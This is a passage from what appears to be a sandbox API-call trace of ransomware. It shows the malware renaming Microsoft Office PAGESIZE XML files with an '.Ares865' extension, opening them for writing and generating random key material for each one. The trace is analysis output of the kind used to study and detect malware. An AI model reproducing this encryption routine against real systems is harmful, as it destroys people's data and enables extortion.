pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0069.191] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0069.194] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL109.XML.Ares865") returned 72 [0069.194] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL109.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pglbl109.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL109.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pglbl109.xml.ares865"), dwFlags=0x1) returned 1 [0069.195] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL109.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pglbl109.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x12c [0069.195] GetFileSizeEx (in: hFile=0x12c, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=11116) returned 1 [0069.195] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f00d8) returned 1 [0069.196] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0069.196] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0069.198] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f00d8) returned 1 [0069.199] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0069.199] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0069.200] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL110.XML.Ares865") returned 72 [0069.200] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL110.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pglbl110.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL110.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pglbl110.xml.ares865"), dwFlags=0x1) returned 1 [0069.200] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL110.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pglbl110.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x12c [0069.200] GetFileSizeEx (in: hFile=0x12c, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=842734) returned 1 [0069.201] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f00d8) returned 1 [0069.201] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0069.201] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0069.239] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0380) returned 1 [0069.240] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0069.240] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0069.251] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL111.XML.Ares865") returned 72 [0069.251] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL111.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pglbl111.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL111.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pglbl111.xml.ares865"), dwFlags=0x1) returned 1 [0069.252] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL111.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pglbl111.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x12c [0069.252] GetFileSizeEx (in: hFile=0x12c, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=262552) returned 1 [0069.253] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0380) returned 1 [0069.253] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0069.253] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0069.265] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0380) returned 1 [0069.266] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0069.266] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0069.270] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGMN001.XML.Ares865") returned 71 [0069.270] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGMN001.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pgmn001.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGMN001.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pgmn001.xml.ares865"), dwFlags=0x1) returned 1 [0069.271] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGMN001.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pgmn001.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x12c [0069.271] GetFileSizeEx (in: hFile=0x12c, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=140414) returned 1 [0069.271] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0380) returned 1 [0069.272] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0069.272] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0069.281] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0380) returned 1 [0069.282] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0069.282] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0069.284] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGMN002.XML.Ares865") returned 71 [0069.284] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGMN002.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pgmn002.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGMN002.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pgmn002.xml.ares865"), dwFlags=0x1) returned 1 [0069.285] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGMN002.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pgmn002.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x12c [0069.285] GetFileSizeEx (in: hFile=0x12c, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=60264) returned 1 [0069.285] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0380) returned 1 [0069.286] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0069.286] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0069.290] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0380) returned 1 [0069.291] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0069.291] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0069.292] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGMN010.XML.Ares865") returned 71 [0069.292] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGMN010.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pgmn010.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGMN010.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pgmn010.xml.ares865"), dwFlags=0x1) returned 1 [0069.294] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGMN010.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pgmn010.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x12c [0069.294] GetFileSizeEx (in: hFile=0x12c, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=7108) returned 1 [0069.294] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0380) returned 1 [0069.294] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0069.295] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0069.297] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0380) returned 1 [0069.297] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0069.297] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0069.298] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGMN011.XML.Ares865") returned 71 [0069.298] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGMN011.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pgmn011.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGMN011.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pgmn011.xml.ares865"), dwFlags=0x1) returned 1 [0069.299] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGMN011.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pgmn011.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x12c [0069.299] GetFileSizeEx (in: hFile=0x12c, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=58072) returned 1 [0069.299] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0380) returned 1 [0069.300] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0069.300] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0069.304] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0380) returned 1 [0069.305] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0069.305] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0069.306] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGMN020.XML.Ares865") returned 71 [0069.306] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGMN020.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pgmn020.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGMN020.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pgmn020.xml.ares865"), dwFlags=0x1) returned 1 [0069.308] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGMN020.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pgmn020.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x12c [0069.308] GetFileSizeEx (in: hFile=0x12c, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=10550) returned 1 [0069.308] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0380) returned 1 [0069.308] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0069.309] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0069.311] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0380) returned 1 [0069.311] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0069.311] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0069.312] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGMN022.XML.Ares865") returned 71 [0069.312] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGMN022.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pgmn022.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGMN022.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pgmn022.xml.ares865"), dwFlags=0x1) returned 1 [0069.313] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGMN022.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pgmn022.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x12c [0069.314] GetFileSizeEx (in: hFile=0x12c, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=92116) returned 1 [0069.314] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0380) returned 1 [0069.314] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0069.314] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0069.320] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0380) returned 1 [0069.321] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0069.321] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0069.322] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGMN026.XML.Ares865") returned 71 [0069.322] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGMN026.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pgmn026.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGMN026.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pgmn026.xml.ares865"), dwFlags=0x1) returned 1 [0069.323] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGMN026.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pgmn026.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x12c [0069.323] GetFileSizeEx (in: hFile=0x12c, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=8638) returned 1 [0069.323] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0380) returned 1 [0069.324] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0069.324] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0069.326] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0380) returned 1 [0069.327] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0069.327] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0069.328] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGMN027.XML.Ares865") returned 71 [0069.328] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGMN027.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pgmn027.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGMN027.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pgmn027.xml.ares865"), dwFlags=0x1) returned 1 [0069.328] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGMN027.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pgmn027.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x12c [0069.328] GetFileSizeEx (in: hFile=0x12c, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=1506) returned 1 [0069.329] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0380) returned 1 [0069.329] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0069.329] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0069.331] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0380) returned 1 [0069.332] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0069.332] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0069.333] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGMN044.XML.Ares865") returned 71 [0069.333] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGMN044.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pgmn044.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGMN044.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pgmn044.xml.ares865"), dwFlags=0x1) returned 1 [0069.336] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGMN044.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pgmn044.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x12c [0069.336] GetFileSizeEx (in: hFile=0x12c, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=5138) returned 1 [0069.336] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0380) returned 1 [0069.337] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0069.337] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0069.339] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0380) returned 1 [0069.340] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0069.340] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0069.340] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGMN048.XML.Ares865") returned 71 [0069.340] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGMN048.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pgmn048.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGMN048.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pgmn048.xml.ares865"), dwFlags=0x1) returned 1 [0069.341] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGMN048.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pgmn048.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x12c [0069.342] GetFileSizeEx (in: hFile=0x12c, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=640202) returned 1 [0069.342] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0380) returned 1 [0069.342] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0069.342] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0069.385] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0380) returned 1 [0069.385] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0069.385] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0069.394] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGMN054.XML.Ares865") returned 71 [0069.394] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGMN054.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pgmn054.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGMN054.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pgmn054.xml.ares865"), dwFlags=0x1) returned 1 [0069.395] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGMN054.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pgmn054.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x12c [0069.395] GetFileSizeEx (in: hFile=0x12c, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=33360) returned 1 [0069.396] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0380) returned 1 [0069.396] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0069.396] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0069.400] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0380) returned 1 [0069.401] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0069.401] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0069.402] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGMN058.XML.Ares865") returned 71 [0069.402] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGMN058.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pgmn058.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGMN058.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pgmn058.xml.ares865"), 